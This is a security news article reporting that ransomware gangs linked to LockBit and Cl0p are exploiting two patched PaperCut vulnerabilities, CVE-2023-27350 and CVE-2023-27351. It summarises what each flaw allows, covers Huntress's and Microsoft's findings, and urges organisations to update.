Critical exploits in print management software PaperCut are being exploited by criminals linked to notorious Russian ransomware gangs LockBit and Cl0p, Microsoft security researchers have said. Patches for the vulnerabilities have been released and PaperCut is urgently advising customers to install them as soon as they can.
The attacks began on 16 April, when cybercriminals were detected using the flaws to install remote management software. PaperCut’s products are used by large enterprises, healthcare and education institutions and local government agencies. The company has more than 100 million users and over 70,000 organisations worldwide, according to its website.
PaperCut bugs exploited by LockBit and Cl0p
Two critical vulnerabilities in PaperCut’s systems classified as CVE-2023-27350 and CVE-2023-27351 are being used by ransomware gangs to move laterally through user systems and gather information which they can use to launch secondary social engineering and phishing attacks.
Patches to these flaws were released by PaperCut at the end of March. However, last week on 19 April the company released an advisory warning that these flaws were being heavily exploited in the wild.
Security company Huntress then produced evidence showing that hackers are exploiting the vulnerabilities to install remote control software Atera and Syncro to unpatched servers. The company has detected 1,800 internet-facing servers that have been targeted.
The same report revealed that 90% of Windows hosts of PaperCut software are vulnerable to these attacks.
Microsoft reveals links to ransomware gangs
Late on Wednesday Microsoft announced the criminals it believes are exploiting these vulnerabilities in the wild. Attacks have been carried out by the Lace Tempest criminal gang, delivering Cl0p ransomware, according to tweets from Microsoft’s Threat Intelligence team.
Lace Tempest is a Cl0p ransomware affiliate that has been observed using various exploits and open-source tools to conduct reconnaissance and steal credentials.
The gang has also been observed deploying LockBit ransomware. “More threat actors could follow suit,” Microsoft warns. “It’s critical for organisations to follow PaperCut’s recommendation to upgrade applications and servers.”
How do the vulnerabilities work?
The first bug, CVE-2023-27350, has a CVSS score of 9.8, making it a critical flaw. It is described by PaperCut as an exploit that “allows for an unauthenticated attacker to get remote code execution (RCE) on a PaperCut Application Server. This could be done remotely and without the need to log in”.
If an attacker already has a basic foothold in a network, as a guest user on an employee laptop for example, a cybercriminal can use this bug to pivot to a more powerful position in the business, explains a report by security company Sophos.
PaperCut describes the second bug, CVE-2023-27351 with a rating of 8.2, as a flaw that “allows for an unauthenticated attacker to potentially pull information about a user stored within PaperCut MF or NG – including usernames, full names, email addresses, office/department info and any card numbers associated with the user”.
The second bug allows attackers to scrape data from the system they have infiltrated. Details of how to update PaperCut software can be found here.